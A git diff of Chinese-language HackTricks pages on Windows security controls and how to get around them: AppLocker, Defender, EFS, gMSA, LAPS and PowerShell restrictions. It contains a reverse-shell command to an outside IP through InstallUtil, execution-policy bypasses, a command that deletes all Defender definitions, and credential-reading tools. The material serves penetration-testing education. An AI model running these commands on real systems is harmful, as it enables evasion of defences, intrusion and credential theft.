检查 **谁** 有 **访问** 文件的权限\
+您还可以在文件夹内使用 `cipher /e` 和 `cipher /d` 来 **加密** 和 **解密** 所有文件
-### 解密EFS文件
+### 解密 EFS 文件
-#### 作为权限系统
+#### 成为权限系统
-这种方式需要**受害用户**在主机内运行一个**进程**。如果是这种情况,可以使用`meterpreter`会话来模拟用户进程的令牌(从`incognito`中的`impersonate_token`)。或者您可以直接`migrate`到用户的进程。
+这种方式要求 **受害者用户** 在主机内 **运行** 一个 **进程**。如果是这种情况,使用 `meterpreter` 会话可以模拟用户进程的令牌(`impersonate_token` 来自 `incognito`)。或者您可以直接 `migrate` 到用户的进程。
#### 知道用户的密码
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
-## 群组管理服务帐户(gMSA)
+## 组管理服务账户 (gMSA)
-微软开发了**群组管理服务帐户(gMSA)**,以简化IT基础设施中服务帐户的管理。与通常启用“**密码永不过期**”设置的传统服务帐户不同,gMSA提供了更安全和可管理的解决方案:
+微软开发了 **组管理服务账户 (gMSA)** 以简化 IT 基础设施中服务账户的管理。与传统的服务账户(通常启用“**密码永不过期**”设置)不同,gMSA 提供了更安全和可管理的解决方案:
-- **自动密码管理**:gMSA使用一个复杂的、240字符的密码,根据域或计算机策略自动更改。这个过程由微软的密钥分发服务(KDC)处理,消除了手动密码更新的需要。
-- **增强安全性**:这些帐户不会被锁定,也不能用于交互式登录,增强了安全性。
-- **多主机支持**:gMSA可以在多个主机之间共享,非常适合在多台服务器上运行的服务。
-- **定时任务功能**:与托管服务帐户不同,gMSA支持运行定时任务。
-- **简化的SPN管理**:当计算机的sAMaccount详细信息或DNS名称发生变化时,系统会自动更新服务主体名称(SPN),简化了SPN管理。
+* **自动密码管理**:gMSA 使用复杂的 240 字符密码,自动根据域或计算机策略进行更改。此过程由微软的密钥分发服务 (KDC) 处理,消除了手动更新密码的需要。
+* **增强安全性**:这些账户免受锁定,并且不能用于交互式登录,从而增强了安全性。
+* **多主机支持**:gMSA 可以在多个主机之间共享,非常适合在多个服务器上运行的服务。
+* **计划任务能力**:与管理服务账户不同,gMSA 支持运行计划任务。
+* **简化 SPN 管理**:当计算机的 sAMaccount 详细信息或 DNS 名称发生更改时,系统会自动更新服务主体名称 (SPN),简化 SPN 管理。
-gMSA的密码存储在LDAP属性_**msDS-ManagedPassword**_中,并且由域控制器(DCs)每30天自动重置一次。这个密码是一个加密的数据块,称为[MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e),只能由授权管理员和安装了gMSA的服务器检索,确保了一个安全的环境。要访问这些信息,需要一个安全连接,如LDAPS,或者连接必须经过“密封和安全”认证。
+gMSA 的密码存储在 LDAP 属性 _**msDS-ManagedPassword**_ 中,并由域控制器 (DC) 每 30 天自动重置一次。此密码是一个称为 [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) 的加密数据块,仅可由授权管理员和安装 gMSA 的服务器检索,从而确保安全环境。要访问此信息,需要安全连接,例如 LDAPS,或者连接必须经过“密封和安全”认证。
-您可以使用[GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)来读取这个密码:
+您可以使用 [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)** 读取此密码:**
```
/GMSAPasswordReader --AccountName jkohler
```
-[**在此帖子中查找更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
+[**在此帖子中找到更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
-还可以查看这个关于如何执行**NTLM中继攻击**以**读取** **gMSA** **密码**的[网页](https://cube0x0.github.io/Relaying-for-gMSA/)。
+此外,请查看此[网页](https://cube0x0.github.io/Relaying-for-gMSA/)关于如何执行**NTLM中继攻击**以**读取** **gMSA**的**密码**。
## LAPS
-**本地管理员密码解决方案(LAPS)**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,可管理本地管理员密码。这些密码是**随机的**、独特的,并且**定期更改**,存储在Active Directory中。通过ACLs对授权用户进行限制访问这些密码。在授予足够权限的情况下,可以读取本地管理员密码。
+**本地管理员密码解决方案(LAPS)**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,允许管理本地管理员密码。这些密码是**随机生成**、唯一且**定期更改**的,集中存储在Active Directory中。对这些密码的访问通过ACL限制为授权用户。授予足够的权限后,可以读取本地管理员密码。
{% content-ref url="active-directory-methodology/laps.md" %}
[laps.md](active-directory-methodology/laps.md)
{% endcontent-ref %}
-## PS 受限语言模式
+## PS受限语言模式
-PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **限制了许多**有效使用PowerShell所需的功能,如阻止COM对象,仅允许批准的.NET类型,基于XAML的工作流程,PowerShell类等。
+PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **锁定了许多有效使用PowerShell所需的功能**,例如阻止COM对象,仅允许批准的.NET类型、基于XAML的工作流、PowerShell类等。
### **检查**
```powershell
@@ -198,22 +200,22 @@ $ExecutionContext.SessionState.LanguageMode
#Easy bypass
Powershell -version 2
```
-在当前的Windows中,绕过不起作用,但可以使用[**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
-**要编译它,您可能需要** **添加引用** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
+在当前的Windows中,绕过方法将不起作用,但您可以使用[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
+**要编译它,您可能需要** **_添加引用_** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
-#### 直接绕过:
+#### 直接绕过:
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
```
-#### 反向 shell:
+#### 反向 shell:
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
-您可以使用[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)或[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)来在任何进程中执行Powershell代码并绕过受限模式。有关更多信息,请查看:[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
+您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 或 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过受限模式。有关更多信息,请查看:[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
-## PS执行策略
+## PS 执行策略
-默认情况下设置为**restricted**。绕过此策略的主要方法:
+默认情况下,它设置为 **restricted.** 绕过此策略的主要方法:
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
@@ -233,32 +235,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
-更多内容请查看[这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
+更多信息可以在 [这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 找到。
-## 安全支持提供程序接口(SSPI)
+## 安全支持提供者接口 (SSPI)
-是用于验证用户的API。
+是用于验证用户的 API。
-SSPI将负责找到两台想要通信的机器的适当协议。首选方法是Kerberos。然后SSPI将协商将使用哪种验证协议,这些验证协议称为安全支持提供程序(SSP),以DLL的形式位于每台Windows机器中,两台机器必须支持相同的协议才能通信。
+SSPI 将负责为想要通信的两台机器找到合适的协议。首选的方法是 Kerberos。然后,SSPI 将协商使用哪个认证协议,这些认证协议称为安全支持提供者 (SSP),以 DLL 的形式位于每台 Windows 机器内部,且两台机器必须支持相同的协议才能进行通信。
-### 主要SSP
+### 主要 SSPs
* **Kerberos**:首选
* %windir%\Windows\System32\kerberos.dll
-* **NTLMv1**和**NTLMv2**:兼容性原因
+* **NTLMv1** 和 **NTLMv2**:出于兼容性原因
* %windir%\Windows\System32\msv1\_0.dll
-* **Digest**:Web服务器和LDAP,密码以MD5哈希的形式
+* **Digest**:Web 服务器和 LDAP,密码以 MD5 哈希形式存在
* %windir%\Windows\System32\Wdigest.dll
-* **Schannel**:SSL和TLS
+* **Schannel**:SSL 和 TLS
* %windir%\Windows\System32\Schannel.dll
-* **Negotiate**:用于协商要使用的协议(Kerberos或NTLM,Kerberos是默认值)
+* **Negotiate**:用于协商使用的协议(Kerberos 或 NTLM,默认是 Kerberos)
* %windir%\Windows\System32\lsasrv.dll
-#### 协商可以提供多种方法或仅一种。
+#### 协商可以提供多种方法或仅提供一种。
-## UAC - 用户账户控制
+## UAC - 用户帐户控制
-[用户账户控制(UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)是一项功能,可为**提升的活动**启用**同意提示**。
+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个启用 **提升活动的同意提示** 的功能。
{% content-ref url="windows-security-controls/uac-user-account-control.md" %}
[uac-user-account-control.md](windows-security-controls/uac-user-account-control.md)
@@ -267,23 +269,24 @@ SSPI将负责找到两台想要通信的机器的适当协议。首选方法是K
 (1) (1) (1) (1) (1) (1).png)
\
-使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
+使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
***
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:
[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术: 
[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/authentication-credentials-uac-and-efs/README.md b/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 640f274ce..316162ae4 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -1,32 +1,33 @@
-# Windows安全控制
+# Windows Security Controls
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
.png)
-使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,并由全球**最先进的**社区工具提供支持。\
-立即获取访问权限:
+使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-## AppLocker策略
+## AppLocker 策略
-应用程序白名单是一份批准的软件应用程序或可在系统上存在和运行的可执行文件列表。其目标是保护环境免受有害恶意软件和与组织特定业务需求不符的未经批准的软件。
+应用程序白名单是一个经过批准的软件应用程序或可执行文件的列表,这些应用程序或可执行文件被允许存在并在系统上运行。其目标是保护环境免受有害恶意软件和不符合组织特定业务需求的未批准软件的影响。
-[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker)是微软的**应用程序白名单解决方案**,让系统管理员控制**用户可以运行哪些应用程序和文件**。它提供对可执行文件、脚本、Windows安装程序文件、DLL、打包应用和打包应用安装程序的**细粒度控制**。\
-组织通常会**阻止cmd.exe和PowerShell.exe**以及对某些目录的写访问,**但这些都可以被绕过**。
+[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) 是微软的 **应用程序白名单解决方案**,为系统管理员提供对 **用户可以运行哪些应用程序和文件** 的控制。它提供对可执行文件、脚本、Windows 安装程序文件、DLL、打包应用程序和打包应用程序安装程序的 **细粒度控制**。\
+组织通常会 **阻止 cmd.exe 和 PowerShell.exe** 以及对某些目录的写入访问,**但这一切都可以被绕过**。
### 检查
@@ -39,60 +40,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
-这个注册表路径包含了AppLocker应用的配置和策略,提供了一种查看系统上当前生效规则集的方式:
+此注册表路径包含由 AppLocker 应用的配置和策略,提供了一种查看系统上强制执行的当前规则集的方法:
* `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
### 绕过
-* 用于绕过AppLocker策略的有用**可写文件夹**:如果AppLocker允许在`C:\Windows\System32`或`C:\Windows`中执行任何操作,那么有**可写文件夹**可用于**绕过此限制**。
+* 有用的 **可写文件夹** 用于绕过 AppLocker 策略:如果 AppLocker 允许在 `C:\Windows\System32` 或 `C:\Windows` 内执行任何内容,则可以使用 **可写文件夹** 来 **绕过此限制**。
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
-* 通常**受信任的**[**"LOLBAS's"**](https://lolbas-project.github.io/)二进制文件也可以用来绕过AppLocker。
-* **编写不良的规则也可能被绕过**
-* 例如,**``**,您可以在任何地方创建一个名为`allowed`的**文件夹**,它将被允许。
-* 组织通常也会专注于**阻止`%System32%\WindowsPowerShell\v1.0\powershell.exe`可执行文件**,但忽略了**其他**[**PowerShell可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) ,如`%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`或`PowerShell_ISE.exe`。
-* **DLL强制执行很少启用**,因为它可能对系统造成额外负担,并且需要大量测试以确保不会出现故障。因此,使用**DLL作为后门将有助于绕过AppLocker**。
-* 您可以使用[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)或[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)在任何进程中**执行Powershell**代码并绕过AppLocker。有关更多信息,请查看:[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
+* 常见的 **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) 二进制文件也可以用于绕过 AppLocker。
+* **编写不当的规则也可能被绕过**
+* 例如,**``**,您可以在任何地方创建一个 **名为 `allowed` 的文件夹**,它将被允许。
+* 组织通常还专注于 **阻止 `%System32%\WindowsPowerShell\v1.0\powershell.exe` 可执行文件**,但忘记了 **其他** [**PowerShell 可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations),例如 `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` 或 `PowerShell_ISE.exe`。
+* **DLL 强制执行很少启用**,因为它可能对系统造成额外负担,并且需要大量测试以确保不会出现故障。因此,使用 **DLL 作为后门将有助于绕过 AppLocker**。
+* 您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 或 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过 AppLocker。有关更多信息,请查看:[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
## 凭据存储
-### 安全帐户管理器(SAM)
+### 安全账户管理器 (SAM)
-本地凭据存在于此文件中,密码已经被哈希。
+本地凭据存储在此文件中,密码经过哈希处理。
-### 本地安全机构(LSA)- LSASS
+### 本地安全机构 (LSA) - LSASS
-**凭据**(哈希)被**保存**在此子系统的**内存**中,用于单点登录。\
-**LSA**管理本地**安全策略**(密码策略,用户权限...),**身份验证**,**访问令牌**...\
-LSA将**检查**提供的凭据是否在**SAM**文件中(用于本地登录),并与**域控制器**通信以验证域用户。
+**凭据**(哈希)被 **保存** 在此子系统的 **内存** 中,以实现单点登录。\
+**LSA** 管理本地 **安全策略**(密码策略、用户权限...)、**身份验证**、**访问令牌**...\
+LSA 将是 **检查** 提供的凭据的 **SAM** 文件(用于本地登录)并与 **域控制器** 进行通信以验证域用户。
-**凭据**被**保存**在**LSASS进程**中:Kerberos票据,哈希NT和LM,易于解密的密码。
+**凭据** 被 **保存** 在 **进程 LSASS** 中:Kerberos 票证、NT 和 LM 哈希、易于解密的密码。
-### LSA秘密
+### LSA 秘密
-LSA可能会在磁盘中保存一些凭据:
+LSA 可能会在磁盘上保存一些凭据:
-* Active Directory计算机帐户的密码(无法访问的域控制器)。
-* Windows服务帐户的密码
+* Active Directory 的计算机账户密码(无法访问的域控制器)。
+* Windows 服务账户的密码
* 计划任务的密码
-* 更多(IIS应用程序的密码...)
+* 更多(IIS 应用程序的密码...)
### NTDS.dit
-这是Active Directory的数据库。仅存在于域控制器中。
+这是 Active Directory 的数据库。它仅存在于域控制器中。
-## 防御者
+## Defender
-[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender)是Windows 10和Windows 11中可用的防病毒软件,以及Windows Server版本。它**阻止**常见的渗透测试工具,如**`WinPEAS`**。但是,有方法可以**绕过这些保护**。
+[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender) 是 Windows 10 和 Windows 11 以及 Windows Server 版本中可用的防病毒软件。它 **阻止** 常见的 pentesting 工具,如 **`WinPEAS`**。然而,有方法可以 **绕过这些保护**。
### 检查
-要检查**Defender**的**状态**,您可以执行PS cmdlet **`Get-MpComputerStatus`**(检查**`RealTimeProtectionEnabled`**的值以了解是否已激活):
+要检查 **Defender** 的 **状态**,您可以执行 PS cmdlet **`Get-MpComputerStatus`**(检查 **`RealTimeProtectionEnabled`** 的值以了解它是否处于活动状态):
PS C:\> Get-MpComputerStatus
@@ -111,7 +112,7 @@ NISEngineVersion : 0.0.0.0
PSComputerName :
-您也可以运行以下内容进行枚举:
+要枚举它,您还可以运行:
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@@ -120,73 +121,74 @@ sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
-## 加密文件系统(EFS)
+## 加密文件系统 (EFS)
-EFS通过加密来保护文件,利用称为**文件加密密钥(FEK)**的**对称密钥**。该密钥使用用户的**公钥**加密,并存储在加密文件的$EFS **备用数据流**中。需要解密时,用户的数字证书对应的**私钥**用于从$EFS流中解密FEK。更多详细信息可在[这里](https://en.wikipedia.org/wiki/Encrypting\_File\_System)找到。
+EFS 通过加密保护文件,利用称为 **文件加密密钥 (FEK)** 的 **对称密钥**。该密钥使用用户的 **公钥** 进行加密,并存储在加密文件的 $EFS **替代数据流** 中。当需要解密时,使用用户数字证书的相应 **私钥** 从 $EFS 流中解密 FEK。更多细节可以在 [这里](https://en.wikipedia.org/wiki/Encrypting\_File\_System) 找到。
-**无需用户启动的解密场景**包括:
+**无需用户启动的解密场景** 包括:
-- 当文件或文件夹移动到非EFS文件系统(如[FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table))时,它们会自动解密。
-- 通过SMB/CIFS协议发送的加密文件在传输之前会被解密。
+* 当文件或文件夹被移动到非 EFS 文件系统(如 [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table))时,它们会自动解密。
+* 通过 SMB/CIFS 协议在网络上传输的加密文件在传输前会被解密。
-这种加密方法允许所有者**透明访问**加密文件。然而,仅仅更改所有者的密码并登录将不允许解密。
+这种加密方法允许所有者对加密文件进行 **透明访问**。然而,仅仅更改所有者的密码并登录并不能允许解密。
-**要点**:
+**关键要点**:
-- EFS使用对称FEK,使用用户的公钥加密。
-- 解密使用用户的私钥访问FEK。
-- 在特定条件下会自动解密,如复制到FAT32或网络传输。
-- 加密文件对所有者可访问,无需额外步骤。
+* EFS 使用对称 FEK,使用用户的公钥加密。
+* 解密使用用户的私钥访问 FEK。
+* 在特定条件下会自动解密,例如复制到 FAT32 或网络传输。
+* 加密文件对所有者可访问,无需额外步骤。
-### 检查EFS信息
+### 检查 EFS 信息
-检查**用户**是否**使用**了此**服务**,检查路径是否存在:`C:\users\\appdata\roaming\Microsoft\Protect`
+检查 **用户** 是否 **使用** 了此 **服务**,检查此路径是否存在:`C:\users\\appdata\roaming\Microsoft\Protect`
-使用`cipher /c \`检查文件的**访问权限**。您还可以在文件夹中使用`cipher /e`和`cipher /d`来**加密**和**解密**所有文件。
+使用 cipher /c \ 检查 **谁** 有 **访问** 文件的权限\
+您还可以在文件夹内使用 `cipher /e` 和 `cipher /d` 来 **加密** 和 **解密** 所有文件
-### 解密EFS文件
+### 解密 EFS 文件
#### 成为权限系统
-这种方式需要**受害用户**在主机内运行一个**进程**。如果是这种情况,可以使用`meterpreter`会话模拟用户进程的令牌(从`incognito`中的`impersonate_token`)。或者您可以直接`migrate`到用户的进程。
+这种方式要求 **受害者用户** 在主机内 **运行** 一个 **进程**。如果是这种情况,使用 `meterpreter` 会话,您可以模拟用户进程的令牌(`incognito` 中的 `impersonate_token`)。或者您可以直接 `migrate` 到用户的进程。
-#### 知道用户密码
+#### 知道用户的密码
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
-## 群组管理服务帐户(gMSA)
+## 组管理服务账户 (gMSA)
-微软开发了**群组管理服务帐户(gMSA)**,以简化IT基础设施中服务帐户的管理。与通常启用“**密码永不过期**”设置的传统服务帐户不同,gMSA提供了更安全和可管理的解决方案:
+微软开发了 **组管理服务账户 (gMSA)** 以简化 IT 基础设施中服务账户的管理。与传统的服务账户(通常启用“**密码永不过期**”设置)不同,gMSA 提供了更安全和可管理的解决方案:
-- **自动密码管理**:gMSA使用一个复杂的、240字符的密码,根据域或计算机策略自动更改。这个过程由微软的密钥分发服务(KDC)处理,消除了手动密码更新的需要。
-- **增强安全性**:这些帐户不会被锁定,也不能用于交互式登录,增强了安全性。
-- **多主机支持**:gMSA可以在多个主机之间共享,非常适合在多台服务器上运行的服务。
-- **定时任务功能**:与托管服务帐户不同,gMSA支持运行定时任务。
-- **简化的SPN管理**:当计算机的sAMaccount详细信息或DNS名称发生变化时,系统会自动更新服务主体名称(SPN),简化了SPN管理。
+* **自动密码管理**:gMSA 使用复杂的 240 字符密码,自动根据域或计算机策略进行更改。此过程由微软的密钥分发服务 (KDC) 处理,消除了手动更新密码的需要。
+* **增强安全性**:这些账户免受锁定,并且不能用于交互式登录,从而增强了安全性。
+* **多主机支持**:gMSA 可以在多个主机之间共享,非常适合在多个服务器上运行的服务。
+* **计划任务能力**:与管理服务账户不同,gMSA 支持运行计划任务。
+* **简化 SPN 管理**:当计算机的 sAMaccount 详细信息或 DNS 名称发生更改时,系统会自动更新服务主体名称 (SPN),简化 SPN 管理。
-gMSA的密码存储在LDAP属性_**msDS-ManagedPassword**_中,并且由域控制器(DC)每30天自动重置一次。这个密码是一个加密的数据块,称为[MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e),只能由授权管理员和安装了gMSA的服务器检索,确保安全环境。要访问这些信息,需要一个安全连接,如LDAPS,或者连接必须经过“密封和安全”认证。
+gMSA 的密码存储在 LDAP 属性 _**msDS-ManagedPassword**_ 中,并由域控制器 (DC) 每 30 天自动重置一次。此密码是一个加密数据块,称为 [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e),只能由授权管理员和安装 gMSA 的服务器检索,从而确保安全环境。要访问此信息,需要安全连接,例如 LDAPS,或者连接必须经过“密封和安全”身份验证。
-您可以使用[GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)来读取这个密码。
+您可以使用 [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)** 读取此密码:**
```
/GMSAPasswordReader --AccountName jkohler
```
-[**在此帖子中查找更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
+[**在此帖子中找到更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
-还可以查看有关如何执行**NTLM中继攻击**以**读取** **gMSA** **密码**的[网页](https://cube0x0.github.io/Relaying-for-gMSA/)。
+此外,请查看此[网页](https://cube0x0.github.io/Relaying-for-gMSA/)关于如何执行**NTLM中继攻击**以**读取** **gMSA**的**密码**。
## LAPS
-**本地管理员密码解决方案(LAPS)**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,可管理本地管理员密码。这些密码是**随机的**、独特的,并且**定期更改**,存储在Active Directory中。通过ACL对授权用户进行限制,可以提供读取本地管理员密码的能力。
+**本地管理员密码解决方案 (LAPS)**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,允许管理本地管理员密码。这些密码是**随机生成**、唯一且**定期更改**的,集中存储在Active Directory中。对这些密码的访问通过ACL限制为授权用户。授予足够的权限后,可以读取本地管理员密码。
{% content-ref url="../active-directory-methodology/laps.md" %}
[laps.md](../active-directory-methodology/laps.md)
{% endcontent-ref %}
-## PS 受限语言模式
